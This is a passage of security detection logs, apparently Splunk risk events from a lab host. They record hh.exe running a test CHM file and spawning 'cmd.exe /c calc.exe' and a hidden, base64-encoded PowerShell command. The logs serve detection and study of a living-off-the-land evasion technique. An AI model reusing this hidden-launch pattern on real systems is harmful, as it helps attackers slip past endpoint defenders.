annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1e90", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x14f0", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x1e90", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="0x14f0", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x210", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x1848", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x210", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x1848", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="cmd.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="\"C:\\Windows\\hh.exe\" C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm", parent_process_id="7388", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="6948", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:27", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:27", parent_process="\"C:\\Windows\\hh.exe\" C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm", parent_process_id="7388", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="6948", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", parent_process_id="7824", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="5360", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", parent_process_id="7824", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="5360", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", parent_process_id="668", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="1012", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
